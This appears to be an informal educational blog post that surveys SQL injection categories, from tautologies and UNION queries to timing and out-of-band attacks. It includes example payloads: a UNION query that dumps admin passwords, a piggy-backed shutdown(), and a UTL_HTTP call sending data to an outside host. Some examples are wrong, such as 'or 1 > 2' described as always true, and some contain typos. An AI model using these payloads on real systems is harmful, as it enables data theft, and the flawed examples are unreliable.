Do you know SQL Injection or you just think you know it?

That is the question with which the lecturer started. I wondered If I really know it too. So I am here writing what I know of SQL Injection, may be someone else could help me out with things that I get wrong or provide me with more insight in to the topic.

Introduction

SQL injection is an attack by which the attackers pass the sql statement from the client to the server for execution. If the sql statement is executed successfully, it may result in a data breach, leaking out information that the developer didn’t intend to show. In addition to this, the attackers can insert, delete or update rows in the database as well.

SQL injection attacks can be divided into few categories based on how the result of the statement execution or how statements are formed. Below are the categories of sql injection types, this article will look into.

  1. Tautologies
  2. Union Queries
  3. Piggy-back queries
  4. Timing attacks
  5. Alternative Encoding
  6. Out of band attacks
  7. Illegal/Logically incorrect Queries

Tautologies

This attack involves use of a boolean condition that results in either always true condition or always false condition

select * from users where username = 'abc' or 1 > 2 '

Above example always eavalute to true.

Union Queries

Union queries work by combining results from two separate queries, which takes data from different tables or view.

select * from users where userId = $id

The id value will be manipulated by the user by adding a union query

$id= 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

This will result in the following query

select * from users where userId = 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

Which gives combined result of both queries.

Piggy-back queries

Piggy back queries are queries appended to a existing query, resulting in more than one query in the statement.

select * from users where userId = 1; shutdown();

The above statement contains two queries, the developers could check for this type of statement before execution of the sql statement.

Timing attacks

Timing attacks are very helpful when the database and application error output is switched off. This is also part of blind sql injection. For this type of attacks the attacker appends a database timing function to the orginal query and verify if the timing functions executes or not, by checking the server response time. If the server responds immediately then the timing function is not working else the database is vulnerable to this type of attacks.

select * from users where userId = 1; sleep(15);

Alternative Encoding

In this type of attacks, the sql text is encoded to avoid detection by defensive coding. These types of attacks are hard to detect. But some of the keywords used in this approach cab be identified.

Select * from members where id=1 OR 'ABC' = concat(conv(10,10,36),
                            conv(11,10,36),conv(12,10,36)),1
Select * from members where id=1 OR 'abc' = char(97,98,99),1
Select * from members where id=1 OR ascii('a') = 97,1
Select * from members where id=1 OR ceil(pi())=4,1
Select * from members where id=1 OR floor(pi()*pi()+pi())=13,

Out of band attacks

This is also very helpful technique for blind sql injection attacker. The attacker could use a dbms functions to execute a command, which result in out of band connection, that passes results to the attacker. For example, the attacker could use this technique to emails user informations.

select * from users where userId = =10||UTL_HTTP.request(‘testerserver.com:80’||
(SELET user FROM DUAL)--

Illegal/Logically incorrect Queries

This is also known as error based sql injection exploitation. This type of attacks help the user when other types of attacks, such as Union queries are not helpful. It is also very helpful at reconnaisence stage of an attack, whereby attacker inputs illegal query to see the resulting output. This result may give information about the backend database system.

select * from users where userId = ' --

The above query will result in error message. To guard against this type of attacks the production database should have the error messaging swtiched off.

………………………….

There is one more type of sql injection called Stored Procedure Injection. For this type of attacks the parameters of the stored procedure are modified to get the results.

Hope this article is informative.